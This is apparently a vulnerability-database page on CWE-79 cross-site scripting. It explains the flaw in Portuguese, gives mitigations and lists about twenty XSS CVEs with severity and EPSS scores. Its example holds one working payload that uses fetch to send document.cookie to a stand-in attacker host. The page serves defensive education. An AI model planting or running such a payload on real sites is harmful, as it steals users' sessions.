Fallos del tipo CWE-79

28.620 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2021-24365—Admin Columns Free (< 4.3.2) & Pro (< 5.5.2) - Authenticated Stored Cross-Site Scripting (XSS) in Custom FieldEPSS 0.9%CVE-2020-15161MEDIUMPotential XSS in PrestaShopEPSS 0.9%CVE-2021-39354MEDIUMEasy Digital Downloads <= 2.11.2 Authenticated Reflected Cross-Site ScriptingEPSS 0.9%CVE-2021-24317—Listeo < 1.6.11 - Multiple XSS & XFS vulnerabilitiesEPSS 0.9%CVE-2019-14884MEDIUMA vulnerability was found in Moodle 3.7 before 3.73, 3.6 before 3.6.7 and 3.5 before 3.5.9, where a reflected XSS possible from some fatal eEPSS 0.9%CVE-2020-10748—A flaw was found in Keycloak's data filter, in version 10.0.1, where it allowed the processing of data URLs in some circumstances. This flawEPSS 0.9%CVE-2021-4284LOWOpenMRS HTML Form Entry UI Framework Integration Module cross site scriptingEPSS 0.9%CVE-2021-39340MEDIUMNotification – Custom Notifications and Alerts for WordPress <= 7.2.4 Authenticated Stored Cross-Site ScriptingEPSS 0.9%CVE-2018-3771—An XSS in statics-server <= 0.0.9 can be used via injected iframe in the filename when statics-server displays directory index in the browseEPSS 0.9%CVE-2021-32852MEDIUMcountly-server vulnerable to Cross-site ScriptingEPSS 0.9%CVE-2022-36108MEDIUMCross-Site Scripting in typo3/cms-coreEPSS 0.9%CVE-2018-3755—XSS in sexstatic <=0.6.2 causes HTML injection in directory name(s) leads to Stored XSS when malicious file is embed with <iframe> element uEPSS 0.9%CVE-2018-3773—There is a stored Cross-Site Scripting vulnerability in Open Graph meta properties read by the `metascrape` npm module <= 3.9.2.EPSS 0.9%CVE-2021-39136HIGHCross-site scripting vulnerability in file uploadEPSS 0.9%CVE-2024-39143MEDIUMA stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious propertEPSS 0.9%CVE-2017-6618—A vulnerability in the web-based GUI of Cisco Integrated Management Controller (IMC) 3.0(1c) could allow an authenticated, remote attacker tEPSS 0.9%CVE-2020-29444MEDIUMAffected versions of Team Calendar in Confluence Server before 7.11.0 allow attackers to inject arbitrary HTML or Javascript via a Cross SitEPSS 0.9%CVE-2026-45249MEDIUMApache ECharts: XSS in Lines series tooltip renderingEPSS 0.9%CVE-2017-12269—A vulnerability in the web UI of Cisco Spark Messaging Software could allow an authenticated, remote attacker to perform a stored cross-siteEPSS 0.9%CVE-2021-41252HIGHCross-site scripting (XSS) from writer field content in the site frontendEPSS 0.9%